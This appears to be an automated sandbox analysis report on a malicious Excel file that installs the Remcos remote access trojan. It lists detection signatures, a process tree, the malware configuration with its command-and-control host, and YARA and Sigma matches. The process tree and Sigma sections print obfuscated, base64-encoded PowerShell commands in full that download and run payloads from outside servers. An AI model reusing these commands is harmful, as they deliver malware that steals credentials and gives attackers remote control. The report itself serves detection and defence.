
Windows Analysis Report
0200011080.xls

Overview

General Information

Sample name: 0200011080.xls
Analysis ID: 1567364
MD5: bd6ddad63fc3c23331d2a7fd5ee23c06
SHA1: 49faa91ee8dd7d5e4484291afa6e1e5bbd0c5b08
SHA256: 6442a471211f88890f7d98021a2b478a872e1f5e6053a1f52fbd65da97755fbb
Tags: xls, user-abuse_ch

Detection

Remcos, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3312 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3588 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3696 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3720 cmdline: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3840 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3848 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBA2.tmp" "c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3936 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 1200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 2392 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\tozq" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 1100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wieivps" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3132 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\gcjtvhddyq" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
    • mshta.exe (PID: 4084 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 1908 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2668 cmdline: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 1076 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2104 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF4EA.tmp" "c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 2116 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 2112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 3640 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Malware configuration: {"Host:Port:Password": ["lonan.duckdns.org:4044:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-Z4DJFI", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security

Source | Rule | Description | Author | Strings
00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
Source | Rule | Description | Author | Strings
32.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
32.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
32.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
32.2.CasPol.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
32.2.CasPol.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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
Source: File created | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3312, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].hta
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , ProcessId: 3936, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3312, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3588, ProcessName: mshta.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , ProcessId: 3936, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", ProcessId: 3840, ProcessName: csc.exe
Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 54.150.207.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
